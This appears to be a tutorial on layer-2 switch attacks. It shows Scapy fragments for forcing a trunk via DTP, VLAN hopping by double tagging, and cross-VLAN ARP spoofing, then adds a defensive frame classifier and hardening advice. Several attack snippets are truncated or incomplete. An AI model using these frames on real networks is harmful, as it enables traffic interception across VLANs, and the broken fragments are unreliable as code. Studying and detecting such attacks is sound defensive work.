If a Cisco switch has DTP (Dynamic Trunking Protocol) enabled on an interface, an attacker can use a laptop to send a dynamic desirable frame to that interface, and the target interface will therefore become a trunk port. This means we can modify our switch’s VLAN configuration and sniff any VLAN’s traffic.


The Scapy library has a module, scapy.contrib.dtp, which contains the negotiate_trunk function. Its content is:

def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):
    print("Trying to negotiate a trunk on interface %s" % iface)
    p = Dot3(src=mymac, dst="01:00:0c:cc:cc:cc")/LLC()/SNAP()/DTP(tlvlist=[DTPDomain(),DTPStatus(),DTPType(),DTPNeighbor(neighbor=mymac)])

  • The first parameter is the name of the interface that is listening to the traffic.
  • The second parameter is optional: it is the spoofed MAC address of the fake switch. If you don’t specify one, a random one is generated.

Write code to mimic the Cisco trunk desirable frame, which can be sent to :

import sys
from scapy.layers.l2 import Dot3, LLC, SNAP
from scapy.contrib.dtp import *

# Print a usage message when no interface name is given
if len(sys.argv) < 2:
    print(sys.argv[0] + " <dev>")

VLAN hopping attack



Basic knowledge: http://frankfu.click/security/ccna-security/secure-the-lan.html/2/

Consider this scenario: host A in VLAN 1 sends a ping packet to host B in VLAN 2. We can use the Scapy library to create the maliciously crafted tag.

Now we create an ICMP packet that crosses VLANs:



from scapy.all import *

packet = Ether(dst="c0:d3:de:ad:be:ef") / \
         Dot1Q(vlan=1) / \
         Dot1Q(vlan=2) / \
         IP(dst="") / \

We specified the MAC address and IP address in the code above and added two VLAN tags: the first tag is the VLAN tag of the sending host, and the second is the target host’s VLAN tag. The switch strips off the first tag, then reads the second one and sends the frame to the target host.

ARP spoof cross VLAN


Because a VLAN separates the broadcast domain, the previous code is useful only within one VLAN. If you want to spoof across VLANs, you have to insert the VLAN tags. The following code makes this happen:


def build_req():
    if options.target is None:
        # No target given: broadcast the ARP frame
        pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
    elif options.target:
        # Target given: resolve its MAC address first
        target_mac = getmacbyip(options.target)
        if target_mac is None:
            print("[-] Error: Could not resolve targets MAC address")
        pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
    return pkt

Then we insert the VLAN tags:

    pkt = Ether(src=mac, dst=target_mac) / Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
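
Seen from the defender's side, the frames described on this page are easy to recognise on the wire: DTP is an 802.3 LLC/SNAP frame sent to 01:00:0c:cc:cc:cc, and both the VLAN hopping packet and the cross-VLAN ARP packet carry two stacked Dot1Q tags. The following is an added example, not code from the original page or from Scapy: a standard-library Python classifier for raw frames captured on a host-facing port. The name classify_frame, the source MAC and all sample frames are constructed for illustration.

```python
import struct

DTP_DST = bytes.fromhex("01000ccccccc")       # Cisco multicast MAC that DTP frames are sent to
DTP_SNAP = bytes.fromhex("aaaa0300000c2004")  # LLC/SNAP header + Cisco OUI + DTP protocol ID 0x2004
TPIDS = {0x8100, 0x88A8}                      # 802.1Q / 802.1ad tag protocol IDs


def classify_frame(frame: bytes) -> dict:
    """Inspect one raw Ethernet frame captured on a host-facing access port."""
    out = {"dtp": False, "vlans": [], "ethertype": None, "alerts": []}
    if len(frame) < 14:
        out["alerts"].append("truncated frame")
        return out
    offset = 12
    (etype,) = struct.unpack_from("!H", frame, offset)
    # Walk every stacked VLAN tag: TPID (2 bytes), TCI (2 bytes), next type (2 bytes).
    while etype in TPIDS:
        if len(frame) < offset + 6:
            out["alerts"].append("truncated VLAN tag")
            return out
        tci, etype = struct.unpack_from("!HH", frame, offset + 2)
        out["vlans"].append(tci & 0x0FFF)     # low 12 bits of the TCI are the VLAN ID
        offset += 4
    out["ethertype"] = etype
    body = frame[offset + 2:]
    # DTP rides in an 802.3 frame (length field <= 1500) with LLC/SNAP, not Ethernet II.
    if etype <= 1500 and frame[:6] == DTP_DST and body[:8] == DTP_SNAP:
        out["dtp"] = True
        out["alerts"].append("DTP frame from host port")
    if len(out["vlans"]) >= 2:
        out["alerts"].append("double-tagged frame: outer VLAN %d, inner VLAN %d"
                             % (out["vlans"][0], out["vlans"][1]))
    return out


# Constructed sample frames (not captured traffic); the source MAC is made up.
SRC = bytes.fromhex("020000000001")
SAMPLES = {
    "double_tag_icmp": bytes.fromhex("c0d3deadbeef") + SRC
        + bytes.fromhex("8100000181000002" "0800") + b"\x45" + bytes(19),
    "double_tag_arp": b"\xff" * 6 + SRC
        + bytes.fromhex("8100000181000002" "0806") + bytes(28),
    "dtp": DTP_DST + SRC + bytes.fromhex("0022") + DTP_SNAP + b"\x01" + bytes(25),
    "plain_arp": b"\xff" * 6 + SRC + bytes.fromhex("0806") + bytes(28),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify_frame(raw)["alerts"] or "ok")
```

A host-facing access port should see neither kind of frame, so any alert here is worth investigating. On the switch, the usual hardening is to set such ports to static access mode with DTP negotiation disabled and to use a native VLAN that no user port belongs to.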